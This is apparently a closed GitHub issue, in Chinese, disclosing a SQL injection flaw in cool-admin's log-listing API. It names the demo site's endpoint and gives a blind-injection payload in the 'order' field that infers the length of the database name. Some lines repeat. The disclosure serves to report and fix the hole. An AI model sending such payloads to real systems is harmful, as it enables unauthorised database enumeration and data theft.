Closed Leeiio closed 2 years ago
比如接口 https://show.cool-admin.com/api/admin/base/sys/log/page
https://show.cool-admin.com/api/admin/base/sys/log/page
使用参数进行POST提交
{ "order": "(select case when (length (database())=6)then 1 else 1 *(select table_name from information_schema.tables)end)", "sort": "desc" }
可以成功执行SQL语句得出数据库名称为6个字符
比如接口
https://show.cool-admin.com/api/admin/base/sys/log/page
使用参数进行POST提交
可以成功执行SQL语句得出数据库名称为6个字符